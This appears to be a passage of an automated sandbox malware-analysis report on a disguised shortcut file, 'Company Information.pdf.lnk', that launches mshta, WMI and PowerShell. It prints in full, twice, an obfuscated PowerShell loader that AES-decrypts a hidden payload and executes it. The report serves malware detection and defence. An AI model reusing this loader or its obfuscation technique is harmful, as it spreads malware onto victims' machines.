Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Company Information.pdf.lnkLNK file: ..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1514828512.000001BBD299D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c.pdb source: mshta.exe, 0000000B.00000003.1522396244.00000202BA3EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1542653933.00000202BA3F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523866483.00000202BA3F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1547057338.00000202BA3F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 0000000B.00000003.1521959961.00000202BE3EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522396244.00000202BA3EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523025408.00000202BA3FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523402554.00000202BE332000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523488640.00000202BA3FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522939946.00000202BE3AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522990692.00000202BE391000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522854586.00000202BE390000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1547408021.00000202BE2D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523402554.00000202BE2F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523955963.00000202BE341000.00000004.00000020.00020000.00000000.sdmp, Buddy[1].11.dr
Source: Binary string: ows\dll\System.pdb source: powershell.exe, 0000000F.00000002.1514316227.000001BBD296E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hpdbtem.pdb source: powershell.exe, 0000000F.00000002.1514316227.000001BBD296E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sethc.pdb source: mshta.exe, 0000000B.00000003.1522396244.00000202BA3EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523402554.00000202BE332000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523488640.00000202BA3FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1547408021.00000202BE2D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523402554.00000202BE2F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523955963.00000202BE341000.00000004.00000020.00020000.00000000.sdmp, Buddy[1].11.dr
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000F.00000002.1515804009.000001BBD2C07000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '3A0550E6F02FF19F0D7D65ABA4322B948E6128C005B35A41C185638A3B71C4B033F6793763A141FC2DF5F78A32CFE93FB3F106BBC73BC0347EB5117739EA6BCDC712DC4913AC95B231C44FD0E7658E3CB70005CF09FB0595EA559B76132DAEB0D282BEEA68B55E7A9BA44EF8B45601264C8696BD55528EF1B9DD98948B27EC7AB79A994DCE5DC246101471E8511E44683A6A4FE675F17184B0F45DD710B0F3E934D3E87202452FBA857892530000F7A72AA942B3A7D215E363C31E439657BB692997478E7649840E3437D9791C71EE2B525FFBC5C786EA290EE8548D38794A4901D3E34E39A178B30A8BCB2E9F77F8824F798590E894BAA701C583A6EE6499D5DF0288032084FF43FA83E2C5C6512028F2396510D21950EF4F2FB6318F3A83552C75935D4092DEB0C6B32CB3A99F0963415214D188C9BA0BF5D41A7805B5D549104E9B78022BF15FA2D7048395767284235F5312081A7124F018F4E91EACDBCCF751A9F28FF37CAF076B6690F025C400C18E2BD9E1A7BD3ED7F7A96C28C15F00B93909DF3C243E431A52E02F105C946283D2D013B71935B51194D17B7BA6983861748E298038CEAD85ED1B369523E084E49C8D30900FE651D1CA9CE4AEBC5CA07121E32BED105B864D5F70953DD58446FBAF635CA7BFB75757279A3990FB975F4A6CA8319BCBB285862375238FD471009713449C2B5759EB614AB609037130BDD0DF5A80E11753BF15D370D14D9457E1A29A143C2993ABCEFC9EBB18A41FD7F01477B69689096D79B0C830798EE3FDD6CCAA115FED76DA4C183FA9145AE9365194967DBD487693C4F977EE4623572CD65340F824D903A9BEE74E567BA2A59D6049158CA16BAF1E740DCFF074D5B76ACD69BD6E62C8FFE8ACB399E025061A2791DCAC39AD53DA9B95EBE3B0E8F162CEDA33CA00F31C9EE377C87715D2EB5D1329BBA8D59E15DE0E867D91D45FCE6A1C1E307F17C1C44415AC23730598729B5AF81791F4BD7DD68D59E5463C9A238BF8BA3D80F58D15CBCBD76A2244C6935E83F51AEB529749508568CDB60F284E5D4320EF0CF1DB2FBEC894A24FF83258219EC3A042E9EA4B7B09A2D6BBF3BA837EF69734C94330CC4312719B08A8D97BED4CA520D35A041F982D71D75204AAE0EA20B8D73572E4BFF0EB5AC4F25EA4DB8C036BC8EABC00D579CC10384D09ABD62B02E86C3A1C7F8C862DE3364811CAB68EB1786B7786BC5725D3493F05A15EAEEE2EE6686D91A9B01CBD4C7885E2B196DAB3663650F11D71EEEDB96A2AAF3442EF119D05205B47F44D7200C81C465F54C21EBC99FF2B96579620097C613B589DD515E8CB8F3230A889E2C6385042EE85D8032B14D1F7031C085BA84F4AF0C953A0070931BB3147C2D40EA5E24309522AE090CC33FD5B9A998F2F88D262EBF6918701F47BB35F236B9AD77BEC3181393A4E03153A5F978106133C121B91E124075B26668FA32D6D38C829EF61BA386E20E210F9B2F8550F9D7F0472F77303A216FA96285E529D264EF798AC3EE226E25F6E9FD15A30A8B1993A229685BC002198BE999C694C7545467374416D7458766A525558';function slF ($bNBDb){return -split ($bNBDb -replace '..', '0x$& ')};$rzZJRI = slF($ddg.SubString(0, 2208));$qvt = [System.Security.Cryptography.Aes]::Create();$qvt.Key = slF($ddg.SubString(2208));$qvt.IV = New-Object byte[] 16;$yPsRN = $qvt.CreateDecryptor();$qVJApxuJ = [System.String]::new($yPsRN.TransformFinalBlock($rzZJRI, 0,$rzZJRI.Length)); sal fd $qVJApxuJ.Substring(3,3); fd $qVJApxuJ.Substring(6)
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '3A0550E6F02FF19F0D7D65ABA4322B948E6128C005B35A41C185638A3B71C4B033F6793763A141FC2DF5F78A32CFE93FB3F106BBC73BC0347EB5117739EA6BCDC712DC4913AC95B231C44FD0E7658E3CB70005CF09FB0595EA559B76132DAEB0D282BEEA68B55E7A9BA44EF8B45601264C8696BD55528EF1B9DD98948B27EC7AB79A994DCE5DC246101471E8511E44683A6A4FE675F17184B0F45DD710B0F3E934D3E87202452FBA857892530000F7A72AA942B3A7D215E363C31E439657BB692997478E7649840E3437D9791C71EE2B525FFBC5C786EA290EE8548D38794A4901D3E34E39A178B30A8BCB2E9F77F8824F798590E894BAA701C583A6EE6499D5DF0288032084FF43FA83E2C5C6512028F2396510D21950EF4F2FB6318F3A83552C75935D4092DEB0C6B32CB3A99F0963415214D188C9BA0BF5D41A7805B5D549104E9B78022BF15FA2D7048395767284235F5312081A7124F018F4E91EACDBCCF751A9F28FF37CAF076B6690F025C400C18E2BD9E1A7BD3ED7F7A96C28C15F00B93909DF3C243E431A52E02F105C946283D2D013B71935B51194D17B7BA6983861748E298038CEAD85ED1B369523E084E49C8D30900FE651D1CA9CE4AEBC5CA07121E32BED105B864D5F70953DD58446FBAF635CA7BFB75757279A3990FB975F4A6CA8319BCBB285862375238FD471009713449C2B5759EB614AB609037130BDD0DF5A80E11753BF15D370D14D9457E1A29A143C2993ABCEFC9EBB18A41FD7F01477B69689096D79B0C830798EE3FDD6CCAA115FED76DA4C183FA9145AE9365194967DBD487693C4F977EE4623572CD65340F824D903A9BEE74E567BA2A59D6049158CA16BAF1E740DCFF074D5B76ACD69BD6E62C8FFE8ACB399E025061A2791DCAC39AD53DA9B95EBE3B0E8F162CEDA33CA00F31C9EE377C87715D2EB5D1329BBA8D59E15DE0E867D91D45FCE6A1C1E307F17C1C44415AC23730598729B5AF81791F4BD7DD68D59E5463C9A238BF8BA3D80F58D15CBCBD76A2244C6935E83F51AEB529749508568CDB60F284E5D4320EF0CF1DB2FBEC894A24FF83258219EC3A042E9EA4B7B09A2D6BBF3BA837EF69734C94330CC4312719B08A8D97BED4CA520D35A041F982D71D75204AAE0EA20B8D73572E4BFF0EB5AC4F25EA4DB8C036BC8EABC00D579CC10384D09ABD62B02E86C3A1C7F8C862DE3364811CAB68EB1786B7786BC5725D3493F05A15EAEEE2EE6686D91A9B01CBD4C7885E2B196DAB3663650F11D71EEEDB96A2AAF3442EF119D05205B47F44D7200C81C465F54C21EBC99FF2B96579620097C613B589DD515E8CB8F3230A889E2C6385042EE85D8032B14D1F7031C085BA84F4AF0C953A0070931BB3147C2D40EA5E24309522AE090CC33FD5B9A998F2F88D262EBF6918701F47BB35F236B9AD77BEC3181393A4E03153A5F978106133C121B91E124075B26668FA32D6D38C829EF61BA386E20E210F9B2F8550F9D7F0472F77303A216FA96285E529D264EF798AC3EE226E25F6E9FD15A30A8B1993A229685BC002198BE999C694C7545467374416D7458766A525558';function slF ($bNBDb){return -split ($bNBDb -replace '..', '0x$& ')};$rzZJRI = slF($ddg.SubString(0, 2208));$qvt = [System.Security.Cryptography.Aes]::Create();$qvt.Key = slF($ddg.SubString(2208));$qvt.IV = New-Object byte[] 16;$yPsRN = $qvt.CreateDecryptor();$qVJApxuJ = [System.String]::new($yPsRN.TransformFinalBlock($rzZJRI, 0,$rzZJRI.Length)); sal fd $qVJApxuJ.Substring(3,3); fd $qVJApxuJ.Substring(6)Jump to behavior
Source: Buddy[1].11.drStatic PE information: 0x9EF0B9FD [Thu Jul 2 03:39:41 2054 UTC]
Source: Buddy[1].11.drStatic PE information: real checksum: 0x1f597 should be: 0x81c24
Source: Buddy[1].11.drStatic PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAAB1F890B push eax; ret 15_2_00007FFAAB1F8921
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAAB2C71C8 push esp; retf 15_2_00007FFAAB2C71C9

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Buddy[1]Jump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Buddy[1]Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.lnkStatic PE information: Company Information.pdf.lnk
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
